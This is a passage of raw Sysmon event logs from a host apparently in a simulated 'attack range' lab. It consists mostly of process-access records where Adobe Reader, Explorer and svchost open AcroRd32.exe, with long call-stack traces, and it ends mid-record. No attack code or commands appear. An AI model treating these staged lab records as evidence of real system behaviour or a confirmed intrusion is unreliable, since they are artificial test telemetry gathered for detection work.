DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.823{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.823{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.823{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.823{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.823{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.745{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.745{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.745{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.745{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000046776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.202{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08FE18C636470151339DFA30146CA4B0,SHA256=987A8CACA961E0F2CA98DC186E2B78268EF15C784CE4DEF2AF529F90FB4C553B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.055{FE4C2B44-E64A-63C7-8706-00000000AF02}14006356C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\system32\twinapi.appcore.dll+4a5dd(wow64)|C:\Windows\system32\twinapi.appcore.dll+489e7(wow64)|C:\Windows\system32\twinapi.appcore.dll+4ba0a(wow64)|C:\Windows\system32\dataexchange.dll+7a02(wow64)|C:\Windows\System32\ole32.dll+319a8(wow64)|C:\Windows\System32\ole32.dll+31aed(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8b1a9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.055{FE4C2B44-E64A-63C7-8706-00000000AF02}14006356C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\system32\twinapi.appcore.dll+4a550(wow64)|C:\Windows\system32\twinapi.appcore.dll+489e7(wow64)|C:\Windows\system32\twinapi.appcore.dll+4ba0a(wow64)|C:\Windows\system32\dataexchange.dll+7a02(wow64)|C:\Windows\System32\ole32.dll+319a8(wow64)|C:\Windows\System32\ole32.dll+31aed(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8b1a9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.039{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005756C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.039{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005756C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.039{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005756C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.039{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005756C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.039{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.039{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:05.024{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader 